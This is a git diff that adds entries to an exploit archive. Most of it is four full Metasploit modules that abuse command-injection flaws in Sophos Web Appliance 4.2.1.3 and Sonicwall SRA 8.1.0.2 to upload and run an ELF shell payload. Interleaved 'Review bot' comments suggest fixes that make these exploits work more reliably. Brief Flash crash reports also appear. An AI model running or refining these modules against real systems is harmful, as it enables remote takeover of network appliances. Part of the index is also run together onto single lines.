diff --git a/files.csv b/files.csv
index 025b36f6a..6ad985f3f 100644
--- a/files.csv
+++ b/files.csv
@@ -5372,6 +5372,13 @@ id,file,description,date,author,platform,type,port
 41365,platforms/windows/dos/41365.txt,"NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission",2017-02-15,"Google Security Research",windows,dos,0
 41367,platforms/windows/dos/41367.txt,"GOM Player 2.3.10.5266 - '.fpx' Denial of Service",2017-02-15,"Peter Baris",windows,dos,0
 41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
+41417,platforms/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos,0
+41418,platforms/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos,0
+41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
+41420,platforms/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos,0
+41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
+41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
+41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -37320,3 +37327,17 @@ id,file,description,date,author,platform,type,port 41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0 41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0 +41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0 +41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41407,platforms/php/webapps/41407.txt,"Joomla! Component Eventix Events Calendar 1.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41408,platforms/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41409,platforms/php/webapps/41409.txt,"Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41410,platforms/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41411,platforms/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41412,platforms/php/webapps/41412.txt,"Joomla! 
Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41413,platforms/hardware/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0 +41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0 +41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0 +41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0 +41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0 diff --git a/platforms/hardware/webapps/41404.html b/platforms/hardware/webapps/41404.html new file mode 100755 index 000000000..e4512046c --- /dev/null +++ b/platforms/hardware/webapps/41404.html @@ -0,0 +1,33 @@ + + Digisol Router CSRF Exploit - Indrajith A.N +
+ + + + diff --git a/platforms/hardware/webapps/41413.rb b/platforms/hardware/webapps/41413.rb new file mode 100755 index 000000000..01f300856 --- /dev/null +++ b/platforms/hardware/webapps/41413.rb 
@@ -0,0 +1,176 @@ +# Exploit Title: Sophos Web Appliance UnBlock/Block-IP Remote Command Injection Vulnerablity +# Date: 12/12/2016 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sophos.com +# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx +# Version: 4.2.1.3 +# Tested on: 4.2.1.3 +# +# CVE : CVE-2016-9553 + +# vuln 1: unblockip parameter / MgrReport.php exploit +# vuln 2: blockip parameter / MgrReport.php exploit + +# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug. +# +# xort @ Critical Start + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sophos Web Appliace <= v4.2.1.3 block/unblock remote exploit', + 'Description' => %q{ + This module exploits two 2 seperate remote command injecection vulnerabilities in + the Sophos Web Appliace Version <= v4.2.1.3 the web administration interface. 
+ By sending a specially crafted request it's possible to inject system + commands + }, + 'Author' => + [ + 'xort', # vuln + metasploit module + ], + 'Version' => '$Revision: 2 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + [ + 'blockip method', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'VulnName' => 'blockip', + 'VulnNum' => '1', + }, + ], + [ + 'unblockip method', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'VulnName' => 'unblockip', + 'VulnNum' => '2', + }, + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 11550; + style_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/index.php", + 'vars_get' => { + 'c' => 'login', + }, + 'vars_post' => + { + + 'STYLE' => style_key, + 'destination' => '', + 'username' => username, + 'password' => password_clear, + } + }, timeout) + + return style_key + end + + def run_command(username, style_password, cmd) + vprint_status( "Running Command...\n" ) + + # random attack method from calling methods into + calling_commands = [ 
'report','trend_volume','trend_suspect','top_app_ctrl','perf_latency','perf_throughput','users_browse_summary','traf_sites','traf_blocked','traf_users','users_virus_downloaders','users_pua_downloaders','users_highrisk','users_policy_violators','users_top_users_by_browse_time','users_quota','users_browse_time_by_user','users_top_users_by_category','users_site_visits_by_user','users_category_visits_by_user','users_monitored_search_queries','users_app_ctrl','traf_category','traf_download' ,'warned_sites' ] + + # select random calling page that calls the vulnerable page MgrReport.php where the vulns are + attack_method = calling_commands[rand(calling_commands.length)] + + # random filename to dump too + 'tmp' HAS to be here. + b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + vprint_status( "Attacking Vuln #" + target['VulnNum']+ " - " + target['VulnName'] + " with " + attack_method + "command method" ) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/index.php?c=trend_suspect&' + target['VulnName'] + '=1.2.3.6`'+ cmd +'`&STYLE='+style_password + }) + + end + + def exploit + # timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + style_hash = do_login(user, password_clear) + + vprint_status("STATUS hash authenticated: #{style_hash}\n") + + sleep(5) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? 
+ + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, style_hash, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2') + + # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) + run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m")) + # wait for magic + handler + + end + + + end +end diff --git a/platforms/hardware/webapps/41414.rb b/platforms/hardware/webapps/41414.rb new file mode 100755 index 000000000..2dda1497e --- /dev/null +++ b/platforms/hardware/webapps/41414.rb 
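Review bot: `do_login` discards `res` and returns the client-chosen `style_key` unconditionally, so a wrong PASSWORD, an unreachable host or a changed login form all fall through to `run_command` as if authenticated; add at least `fail_with(Failure::Unreachable, 'no response from login') unless res` plus a check for whatever the appliance returns on a successful login, and state in the description that the module relies on the appliance accepting a client-supplied STYLE value as its session identifier, which is what the code appears to assume. The CMD branch of `exploit` hands `run_command` a string with raw spaces, quotes and `>` that is concatenated straight into `'uri'`, whereas the ELF branch pre-encodes them as `%20`/`%2b`; use the same encoding in both branches or move the payload into `vars_get` and let the framework encode it. `attack_method` is picked at random but the request hardcodes `c=trend_suspect`, and `b64dumpfile`, `username` and `timeout` are never used. `'Privileged'` is set twice (true, then false) and `'References'` is `['none','none']` although the header names CVE-2016-9553; use `[ 'CVE', '2016-9553' ]` and a single `'Privileged'` value that matches the `sudo` use in the CMD branch.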
@@ -0,0 +1,168 @@ +# Exploit Title: Sophos Web Appliance diagnostic_tools wget Remote Command Injection Vulnerablity +# Date: 12/12/2016 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sophos.com +# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx +# Version: 4.2.1.3 +# Tested on: 4.2.1.3 +# +# CVE : CVE-2016-9554 + +# vuln: diagnostic_tools command / host parameter / MgrReport.php exploit + +# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug. +# +# xort @ Critical Start + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sophos Web Appliace <= v4.2.1.3 remote exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Sophos Web Appliace Version <= v4.2.1.3. The vulnerability exist in + a section of the machine's adminstrative infertface for performing diagnostic + network test with wget and unsanitized unser supplied information. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + style_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/index.php", + 'vars_get' => { + 'c' => 'login', + }, + 'vars_post' => + { + + 'STYLE' => style_key, + 'destination' => '', + 'section' => '', + 'username' => username, + 'password' => password_clear, + } + }, timeout) + + return style_key + end + + def run_command(username, style_password, cmd) + + vprint_status( "Running Command...\n" ) + + # send request with payload + res = send_request_cgi({ + 'method' => 'POST', + 'vars_post' => { + 'action' => 'wget', + 'section' => 'configuration', + 'STYLE' => style_password , + 'url' => 'htt%3a%2f%2fwww.google.com%2f`'+cmd+'`', + }, + 'vars_get' => { + 'c' => 'diagnostic_tools', + }, + }) + + end + + + def exploit + # timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + # do authentication + style_hash = do_login(user, password_clear) + + vprint_status("STATUS hash authenticated: #{style_hash}\n") + + # pause to let things run smoothly + sleep(5) + + #if 
no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, style_hash, ("sudo%20/bin/rm%20-f%20/tmp/n%20;printf%20\"#{encoded_cmd}\"%20>%20/tmp/n;%20chmod%20+rx%20/tmp/n;/tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2') + + # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) + run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m")) + + # wait for magic + handler + + end + + + end +# sophox-release +end diff --git a/platforms/hardware/webapps/41415.rb b/platforms/hardware/webapps/41415.rb new file mode 100755 index 000000000..4bb2f6710 --- /dev/null +++ b/platforms/hardware/webapps/41415.rb 
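Review bot: `run_command` places the pre-encoded `htt%3a%2f%2fwww.google.com%2f` string and a `cmd` that `exploit` already percent-encodes (`sudo%20/bin/rm%20-f…`) into `vars_post`, and `send_request_cgi` URL-encodes form values itself unless `'encode_params' => false` is given, so the appliance would receive `%2520` rather than a space; pass the raw command and let the framework encode once, or disable encoding explicitly, and confirm which of the two the 4.2.1.3 test actually exercised. As in the sibling module, `do_login` never inspects `res`, so a failed login is silently treated as success; add a `fail_with` check on the response before `run_command`. `'References'` should carry `[ 'CVE', '2016-9554' ]` instead of `['none','none']`, and the duplicated `'Privileged'` key (true, then false) should be collapsed to one value.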
@@ -0,0 +1,208 @@ +# Exploit Title: Sonicwall extensionsettings scriptname Remote Command Injection Vulnerablity +# Date: 12/25/2016 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sonicwall.com +# Software Link: sonicwall.com/products/sra-virtual-appliance +# Version: 8.1.0.2-14sv +# Tested on: 8.1.0.2-14sv +# +# CVE : (awaiting cve) + +# vuln: extensionsettings.cgi / scriptfile (filename) parameter / + +# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. +# +# xort @ Critical Start + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in + a section of the machine's adminstrative infertface for performing configurations + related to on-connect scripts to be launched for users's connecting. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + style_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-bin/userLogin", + 'headers' => { + 'Connection' => 'close', + 'Content-Type' => 'application/x-www-form-urlencoded', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0', + }, + 'vars_post' => { + 'username' => username, + 'password' => password_clear, + 'domain' => 'LocalDomain', + 'loginButton' => 'Login', + 'state' => 'login', + 'login' => 'true', + 'VerifyCert' => '0', + 'portalname' => 'VirtualOffice', + 'ajax' => 'true' + }, + }, timeout) + + swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0] + + return swap + end + + def run_command_spliced(username, swap_cookie, cmd) + + vprint_status( "Running Command...\n" ) + + # send request with payload + res = send_request_cgi({ + 'method' => 'GET', +# 'uri' => "/cgi-bin/diagnostics?currentTSREmailTo=|#{cmd}|x&tsrEmailCurrent=true", + 'uri' => "/cgi-bin/diagnostics", + 'vars_get' => { + 'tsrEmailCurrent' => 'true', + 
'currentTSREmailTo' => '|'+cmd+'|x', + }, + 'headers' => { + 'Cookie' => 'swap='+swap_cookie+';', + 'Content-Type' => 'text/plain; charset="iso-8859-1"', + 'Connection' => 'close', + }, + }, 30 ) + + end + + def run_command(username, swap_cookie, cmd) + + write_mode = ">" + dump_file = "/tmp/qq" + + # base64 - encode with base64 so we can send special chars and multiple lines + #cmd_encoded = Base64.strict_encode64(cmd) + + cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + vprint_status("cmd_encoded = #{cmd_encoded}") + + for cmd_chunk in cmd_encoded.split(/(....................................................................................................)/) + + cmd_new = "printf%20\"#{cmd_chunk}\"#{write_mode}#{dump_file}" + #cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}".gsub("+", "_") + + # set to normal append for loops after the first round + if write_mode == ">" + write_mode = ">>" + end + + # add cmd to array to be exected later + run_command_spliced(username, swap_cookie, cmd_new) + + end + + # execute payload stored at dump_file + + run_command_spliced(username, swap_cookie, "chmod%20777%20/tmp/qq;sh%20/tmp/qq") + + end + + def exploit + # timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + # do authentication + swap_cookie = do_login(user, password_clear) + + vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n") + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? 
+ + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + vprint_status("encoded_cmd = #{encoded_cmd}") + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, swap_cookie, ("sudo /bin/rm -f /tmp/n;printf \"#{encoded_cmd}\">/tmp/n;chmod +rx /tmp/n;/tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + vprint_status("encoded_elf = #{encoded_elf}") + + # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) + run_command(user, swap_cookie, ("echo -e \"#{encoded_elf}\"\>/tmp/m\;chmod +rx /tmp/m\;/tmp/m")) + + + # wait for magic + handler + + end + + + end +# sophox-release +end diff --git a/platforms/hardware/webapps/41416.rb b/platforms/hardware/webapps/41416.rb new file mode 100755 index 000000000..dc74edb51 --- /dev/null +++ b/platforms/hardware/webapps/41416.rb 
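Review bot: The header and `Name` describe an injection through extensionsettings.cgi's scriptfile parameter, but `run_command_spliced` sends the payload to `/cgi-bin/diagnostics` as `currentTSREmailTo=|cmd|x`, so either the advisory text or the request is wrong and the two should be reconciled before publication. `do_login` dereferences `res.headers['Set-Cookie']` without checking that `res` is non-nil, splits on the single-quoted literal `'\n'` (a backslash and an n, not a newline), and returns nil when no `swap` cookie is issued, which later fails with a TypeError in `'swap='+swap_cookie`; add `fail_with(Failure::NoAccess, 'login failed: no swap cookie') if swap.nil?`. In `run_command`, `split` with a capturing group yields an empty string between every chunk, so every other request is a useless `printf "">/tmp/qq`; `cmd_encoded.scan(/.{1,100}/)` gives the chunks directly. The final `chmod 777 /tmp/qq;sh /tmp/qq` leaves a world-writable script on the appliance and nothing removes `/tmp/qq`, `/tmp/m` or `/tmp/n`; `chmod 700` and a cleanup step would be safer on an engagement.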
@@ -0,0 +1,195 @@ +# Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerablity +# Date: 12/24/2016 +# Exploit Author: xort @ Critical Start +# Vendor Homepage: www.sonicwall.com +# Software Link: sonicwall.com/products/sra-virtual-appliance +# Version: 8.1.0.2-14sv +# Tested on: 8.1.0.2-14sv +# +# CVE : (awaiting cve) + +# vuln: viewcert.cgi / CERT parameter + +# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. +# +# xort @ Critical Start + + + + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv viewcert.cgi remote exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in + a section of the machine's adminstrative infertface for performing configurations + related to on-connect scripts to be launched for users's connecting. 
+ }, + 'Author' => + [ + 'xort@Critical Start', # vuln + metasploit module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(443), + ], self.class) + end + + def do_login(username, password_clear) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-bin/userLogin", + 'headers' => { + 'Connection' => 'close', + 'Content-Type' => 'application/x-www-form-urlencoded', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0', + }, + 'vars_post' => { + 'username' => username, + 'password' => password_clear, + 'domain' => 'LocalDomain', + 'loginButton' => 'Login', + 'state' => 'login', + 'login' => 'true', + 'VerifyCert' => '0', + 'portalname' => 'VirtualOffice', + 'ajax' => 'true' + }, + }, timeout) + + swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0] + + return swap + end + + + def run_command(swap_cookie, cmd) + + # vars + timeout = 1550; + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-bin/viewcert", + 'data' => "buttontype=delete&CERT=newcert-1`#{cmd}`", + 'headers' => + { + 'Cookie' => "swap=#{swap_cookie}", + }, + }, timeout) + end + + def run_command_spliced(swap_cookie, cmd) + + write_mode = ">" + dump_file = "/tmp/qq" + reqs = 0 + + cmd_encoded = 
cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + for cmd_chunk in cmd_encoded.split(/(....................................)/) + + cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}" + reqs += 1 + + vprint_status("Running Command (#{reqs})\n") + + # set to normal append for loops after the first round + if write_mode == ">" + write_mode = ">>" + end + + # add cmd to array to be exected later + run_command(swap_cookie, cmd_new) + end +# vprint_status("Running Final Command ...\n") + + # execute payload stored at dump_file + run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq") + + end + + def exploit + # timeout + timeout = 1550; + + # params + password_clear = datastore['PASSWORD'] + user = datastore['USERNAME'] + + # do authentication + swap_cookie = do_login(user, password_clear) + + vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n") + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" )) + + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + + run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m") + # wait for magic + handler + end + end +end diff --git a/platforms/multiple/dos/41420.txt b/platforms/multiple/dos/41420.txt new file mode 100755 index 000000000..20c33c451 --- /dev/null +++ b/platforms/multiple/dos/41420.txt 
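Review bot: `run_command` sends the command in a raw `'data'` body as `buttontype=delete&CERT=newcert-1`cmd`` with no Content-Type header and no encoding, so any `&` in CMD terminates the CERT parameter and, if viewcert.cgi form-decodes the body, the `+` in `chmod +rx /tmp/n` (CMD branch) arrives as a space and `/tmp/n` is never made executable; percent-encode `cmd` with `Rex::Text.uri_encode` or submit it through `vars_post` (the ELF path only survives because its whole command is hex-encoded inside `printf`). The `Description` text is copied from the extensionsettings module ("on-connect scripts") and does not describe the viewcert.cgi CERT injection the `Name` refers to. `do_login` has the same unchecked `res`/nil-cookie problem as the sibling modules, and `split(/(....)/)` with a capturing group emits an empty chunk before every real one, doubling the request count; `scan(/.{1,36}/)`-style chunking avoids that.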
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1018
+
+There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on a server and visit http://127.0.0.1/LoadMP4.swf?file=unsigned.mp4.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41420.zip
diff --git a/platforms/multiple/dos/41421.txt b/platforms/multiple/dos/41421.txt
new file mode 100755
index 000000000..281e699a8
--- /dev/null
+++ b/platforms/multiple/dos/41421.txt
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1013
+
+The attached fuzzed swf causes stack corruption when it is loaded, likely due to the parsing of the SWF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41421.zip
diff --git a/platforms/multiple/dos/41422.txt b/platforms/multiple/dos/41422.txt
new file mode 100755
index 000000000..92149b0e4
--- /dev/null
+++ b/platforms/multiple/dos/41422.txt
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1007
+
+The attached swf causes a use-after-free in applying bitmap filters.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41422.zip
diff --git a/platforms/multiple/dos/41423.txt b/platforms/multiple/dos/41423.txt
new file mode 100755
index 000000000..b1cc6b175
--- /dev/null
+++ b/platforms/multiple/dos/41423.txt
@@ -0,0 +1,9 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1008
+
+The attached FLV file causes a heap overflow in YUVPlane decoding.
+
+To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yvplane.flv.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41423.zip
